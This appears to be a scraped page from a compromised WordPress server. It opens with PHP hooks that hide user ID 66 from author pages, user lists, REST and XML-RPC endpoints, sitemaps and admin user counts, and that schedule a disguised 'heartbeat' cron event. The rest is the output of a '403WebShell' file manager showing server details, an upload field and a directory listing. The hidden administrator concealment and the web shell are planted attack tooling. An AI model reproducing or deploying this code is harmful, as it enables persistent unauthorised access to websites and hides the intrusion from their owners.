add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 66;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 66 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 66;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 66;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 66;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 66;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
403WebShell 403Webshell
Server IP : 167.235.224.122 / Your IP : 216.73.216.110 Web Server : Apache/2.4.58 (Ubuntu) System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64 User : deploy ( 1000 ) PHP Version : 8.4.23 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : / snap /core22 /2340 /usr /share /lintian /overrides / Upload File :
[ Back ]
Name
Size
Last Modified
Owner / Group
Permissions
Options
..
--
January 28 2026 03:50:21
root / root
0755
base-files
0.962 KB
September 10 2024 11:16:25
root / root
0644
base-passwd
0.03 KB
September 24 2021 21:02:16
root / root
0644
bash
0.152 KB
March 14 2024 11:31:47
root / root
0644
bsdutils
0.05 KB
February 20 2022 23:13:24
root / root
0644
cloud-init
0.652 KB
August 12 2025 19:48:04
root / root
0644
cryptsetup
0.158 KB
August 04 2022 12:07:26
root / root
0644
dash
0.104 KB
November 03 2021 10:51:39
root / root
0644
dbus
0.278 KB
September 09 2021 13:28:02
root / root
0644
dbus-user-session
0.131 KB
June 28 2021 12:15:25
root / root
0644
dpkg
0.04 KB
November 21 2021 22:06:20
root / root
0644
e2fsprogs
0.064 KB
January 07 2022 00:27:35
root / root
0644
iproute2
1.077 KB
November 05 2021 23:08:14
root / root
0644
libbrotli1
0.088 KB
September 04 2020 22:11:03
root / root
0644
libc-bin
1.053 KB
July 15 2025 09:40:00
root / root
0644
libc6
0.55 KB
July 15 2025 09:40:00
root / root
0644
libcap2-bin
0.114 KB
October 14 2020 21:49:40
root / root
0644
libcryptsetup12
0.238 KB
August 04 2022 12:07:26
root / root
0644
libdb5.3
0.073 KB
March 23 2021 15:15:50
root / root
0644
libdbus-1-3
0.126 KB
June 28 2021 12:15:25
root / root
0644
libedit2
0.321 KB
July 16 2021 18:26:04
root / root
0644
libgcc-s1
0.044 KB
July 15 2025 03:45:40
root / root
0644
libglib2.0-0
0.492 KB
June 20 2025 13:38:50
root / root
0644
libgssapi-krb5-2
0.055 KB
March 07 2023 20:14:07
root / root
0644
libidn2-0
0.085 KB
July 19 2021 18:55:00
root / root
0644
libkrb5-3
0.062 KB
March 07 2023 20:14:07
root / root
0644
libpam-modules
0.824 KB
November 17 2024 10:17:22
root / root
0644
libpam-modules-bin
0.193 KB
November 17 2024 10:17:22
root / root
0644
libpam-runtime
0.233 KB
November 17 2024 10:17:22
root / root
0644
libpam0g
0.557 KB
November 17 2024 10:17:22
root / root
0644
libplymouth5
0.047 KB
February 23 2022 13:38:49
root / root
0644
libpython3.10-minimal
0.412 KB
January 08 2026 06:52:19
root / root
0644
libpython3.10-stdlib
0.83 KB
January 08 2026 06:52:19
root / root
0644
libssh-4
0.114 KB
December 25 2021 18:36:01
root / root
0644
login
0.111 KB
November 11 2021 15:42:38
root / root
0644
mount
0.091 KB
February 20 2022 23:13:24
root / root
0644
ncurses-base
0.232 KB
January 16 2022 12:15:25
root / root
0644
netplan.io
0.086 KB
September 04 2023 09:17:14
root / root
0644
openssh-client
0.077 KB
March 10 2025 15:51:50
root / root
0644
openssl
0.156 KB
August 30 2023 10:38:48
root / root
0644
passwd
0.305 KB
November 11 2021 15:42:38
root / root
0644
perl-base
0.314 KB
August 25 2021 18:11:56
root / root
0644
plymouth
0.155 KB
February 23 2022 13:38:49
root / root
0644
polkitd
0.293 KB
February 26 2022 11:11:57
root / root
0644
procps
0.078 KB
February 25 2022 11:32:20
root / root
0644
python3
0.089 KB
June 05 2018 21:35:36
root / root
0644
python3-certifi
0.038 KB
September 08 2020 06:28:44
root / root
0644
python3-dbus
0.229 KB
September 15 2021 15:46:27
root / root
0644
python3-distutils
0.025 KB
December 11 2017 19:45:42
root / root
0644
python3-lib2to3
0.025 KB
December 24 2017 14:58:12
root / root
0644
python3.10
0.284 KB
January 08 2026 06:52:19
root / root
0644
python3.10-minimal
0.064 KB
January 08 2026 06:52:19
root / root
0644
readline-common
0.041 KB
August 29 2009 10:34:33
root / root
0644
sudo
0.769 KB
August 04 2022 10:34:35
root / root
0644
systemd
0.042 KB
August 26 2025 15:23:06
root / root
0644
tzdata
0.595 KB
April 22 2025 10:15:47
root / root
0644
ucf
0.291 KB
June 16 2020 05:37:53
root / root
0644
util-linux
0.092 KB
February 20 2022 23:13:24
root / root
0644
vim-common
0.196 KB
August 27 2024 05:29:41
root / root
0644
vim-tiny
0.131 KB
April 02 2025 12:39:01
root / root
0644
wpasupplicant
0.525 KB
July 21 2025 23:13:31
root / root
0644
Youez - 2016 - github.com/yon3zuLinuXploit